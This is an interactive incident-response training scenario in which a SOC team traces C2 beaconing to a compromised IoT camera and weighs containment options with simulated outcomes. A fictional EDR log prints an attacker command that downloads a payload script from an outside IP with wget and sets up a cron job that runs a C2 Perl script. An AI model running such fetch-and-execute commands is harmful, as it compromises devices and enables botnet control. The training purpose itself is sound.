ÇOLHAK Corporation – Advanced IoT Crisis Simulation
In this interactive scenario, you are a member of the ÇOLHAK Corporation's cybersecurity team. Your mission is to analyze an evolving security threat, make critical decisions, and protect the company from a potential disaster. Carefully evaluate the information presented at each step. Are you ready?
As the day begins, Tier-1 SOC Analyst Ezgi notices a critical alert on the SIEM (Security Information and Event Management) dashboard. A correlation rule has been triggered: "Periodic Data Exfiltration from Critical Asset Network to Unknown C2 Server".
ALERT ID: 8451
TRIGGER: Correlation Rule - "Suspicious C2 Beaconing"
SOURCE IP: 10.10.30.15 (VLAN: IoT Devices)
HOSTNAME: KAMERA-3KAT-OKYANUS
SOURCE MAC: 00:1A:2B:3C:4D:5E
DESTINATION IP: 88.54.12.219 (Reputation: Low, Category: Unknown)
PROTOCOL: UDP/443
OBSERVATION: A 128KB data packet is being sent every 5 minutes for the last 3 hours.
PCAP SUMMARY: DNS query for 'update.serve-config.net' resolved to 88.54.12.219. UDP payload contains obfuscated Base64 strings.
MITRE ATT&CK MAPPING: T1041 (Exfiltration Over C2), T1571 (Non-Standard Port)
Ezgi: "This isn't normal traffic. The source IP appears to be on the IoT VLAN, and the destination is a suspicious address we haven't seen before. The MITRE mappings are also concerning. I'm escalating this to Tier-2 (Alper) immediately."
Almost at the same time as Ezgi's analysis, two different event logs appear in the system. As a team, you must decide which event to prioritize.
User: Ayşe Yılmaz
Subject: The camera in the 3rd Floor Ocean Meeting Room is constantly freezing and its web interface is very slow. There was no such problem yesterday morning.
System: Active Directory
Subject: Over 50 failed login attempts detected for the Chief Financial Officer (CFO) account in the last 15 minutes.
Team Lead: "We have two potentially serious incidents. One is a potential data leak, the other could be an attack on a high-level executive's account. Our resources are limited, which one do we focus on?"
The team decides to focus on the CFO's account. A quick investigation reveals that the CFO is on vacation abroad and was repeatedly trying to log in from their mobile device after forgetting their new password. The account is temporarily locked, and the situation is brought under control.
Alper: "That was a false positive. But we lost about 20 minutes investigating it. We need to get back to the other incident urgently. I hope we're not too late."
Tier-2 Analyst Alper correlates the SIEM alert with the help desk ticket. He queries the suspicious IP address `10.10.30.15` in the company's Asset Management System. The result is clear: The IP address belongs to a "SmartEye 3000" model IP camera in the 3rd Floor Ocean Meeting Room.
Alper takes his analysis a step further by checking the EDR (Endpoint Detection and Response) console and finds a critical piece of evidence:
EDR LOG - Device: KAMERA-3KAT-OKYANUS (10.10.30.15)
PROCESS: /bin/busybox
COMMAND: busybox wget http://88.54.12.219/payload.sh -O /tmp/p.sh
ACTION: 'p.sh' script executed. A crontab job was created containing the command 'perl /tmp/c2.pl'.
A quick internet search reveals a recently disclosed critical vulnerability (CVE-2025-1337) in this model's firmware. This vulnerability allows for unauthorized Remote Code Execution (RCE).
Alper: "Okay, it all makes sense now. The slowdown in the camera isn't a malfunction; it's a symptom. The device has been compromised via a known vulnerability, downloaded a payload, and is sending data to a C2 server as part of a botnet. We need to report this to our manager, Ceyda, immediately."
Just as Alper is preparing to present his findings to Ceyda, his phone rings. It's the Sales Director, and he sounds very tense.
Sales Director: "Is your team dealing with the camera in the Ocean Room? That camera needs to be operational in less than an hour, we have a live demo for a very important international client! You can't shut down the room, find a solution immediately!"
This new information reveals that the decision to be made has not only a technical but also an operational dimension. The pressure on the team has increased.
Alper summarizes the situation for Cybersecurity Manager Ceyda: "We have an IP camera that has been compromised using the CVE-2025-1337 vulnerability. For now, it's only communicating with the outside with small data packets, which looks like 'beaconing' activity. We haven't detected any lateral movement within the network yet. However, the Sales Department needs that camera in less than an hour."
Ceyda: "Understood. Our time is limited, and we're under pressure. It seems we have three options. The decision is yours. What do we do?"
Make your decision as a team:
Immediately disconnect the camera from the network. Take the device to a lab environment, capture its image, and update it with the latest firmware. The threat is stopped instantly.
Risk: We won't be able to learn more about who the attacker is or what their ultimate goal is. The sales presentation will be canceled.
Redirect the camera's traffic to a "Honeypot" environment that is completely isolated from the main network. Secretly monitor the attacker's behaviors (TTPs) to gather valuable intelligence.
Risk: The attacker might notice the Honeypot or launch a more aggressive attack (e.g., ransomware) during observation.
Move the camera to an isolated VLAN with no internet access. Block its egress traffic but allow it to communicate with 'bait' assets on the local network to observe its actions. This could reveal lateral movement attempts.
Risk: A configuration error could allow the attacker to escape the quarantine. The sales presentation might still be delayed.
The team decided to implement Option A. The camera's port was immediately disabled on the switch, and the device was physically removed to the lab. The sales presentation was canceled.
Affected Systems
1
Financial Loss
₺50,000
Data Loss
0%
Reputation Score
95/100
The team decided to implement Option B. However, the experienced attacker noticed the Honeypot and launched an aggressive attack.
Affected Systems
4+
Financial Loss
₺15,000,000+
Data Loss
40%
Reputation Score
20/100
The team decided to implement Option C. The camera was moved to a special VLAN with no internet access, and all its activity was monitored.
Affected Systems
1
Financial Loss
₺5,000
Data Loss
0%
Reputation Score
100/100
ShadowCircuit v6 – © 2025 ÇOLHAK